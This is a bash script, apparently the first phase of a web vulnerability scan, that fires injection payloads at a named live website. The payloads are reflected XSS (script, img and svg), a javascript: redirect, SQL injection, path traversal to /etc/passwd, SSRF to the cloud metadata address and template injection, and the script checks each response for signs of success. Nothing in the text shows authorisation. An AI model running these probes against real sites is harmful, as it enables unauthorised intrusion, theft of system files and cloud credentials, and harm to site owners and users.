#!/bin/bash
echo "=== PHASE 1: URL Parameter Injection ==="
echo ""

declare -A payloads
payloads["q_xss"]='https://www.realwave.com/?q=<script>alert(1)</script>'
payloads["redirect_js"]='https://www.realwave.com/?redirect=javascript:alert(1)'
payloads["callback_img"]='https://www.realwave.com/?callback=<img+src=x+onerror=alert(1)>'
payloads["search_svg"]='https://www.realwave.com/?search=<svg/onload=alert(1)>'
payloads["id_sqli"]='https://www.realwave.com/?id=1%27%20OR%201=1--'
payloads["page_lfi"]='https://www.realwave.com/?page=../../../../etc/passwd'
payloads["url_ssrf"]='https://www.realwave.com/?url=http://169.254.169.254/latest/meta-data/'
payloads["template_ssti"]='https://www.realwave.com/?template={{7*7}}'

for name in "${!payloads[@]}"; do
  url="${payloads[$name]}"
  echo "--- Test: $name ---"
  echo "URL: $url"
  response=$(curl -s -w "\n---HTTP_CODE:%{http_code}---\n---SIZE:%{size_download}---" -D - "$url" 2>&1)
  http_code=$(echo "$response" | grep -o 'HTTP_CODE:[0-9]*' | cut -d: -f2)
  headers=$(echo "$response" | sed '/^\r$/q')
  body=$(echo "$response" | sed '1,/^\r$/d' | head -c 1000)
  echo "HTTP Code: $http_code"
  echo "Headers (key ones):"
  echo "$headers" | grep -iE '(content-type|x-powered|server|x-frame|content-security|set-cookie|location)' || echo "  (none matched)"
  echo "Body (first 500 chars):"
  echo "$body" | head -c 500
  echo ""
  
  # Check for reflection
  if echo "$body" | grep -q '<script>alert(1)</script>'; then
    echo "*** REFLECTED XSS DETECTED! Payload reflected unencoded! ***"
  elif echo "$body" | grep -q '<img src=x onerror=alert(1)>'; then
    echo "*** REFLECTED XSS DETECTED! IMG payload reflected! ***"
  elif echo "$body" | grep -q '<svg/onload=alert(1)>'; then
    echo "*** REFLECTED XSS DETECTED! SVG payload reflected! ***"
  elif echo "$body" | grep -q '49'; then
    echo "  [CHECK] Possible SSTI - 49 found in response (could be {{7*7}} evaluated)"
  fi
  echo "========================================="
  echo ""
done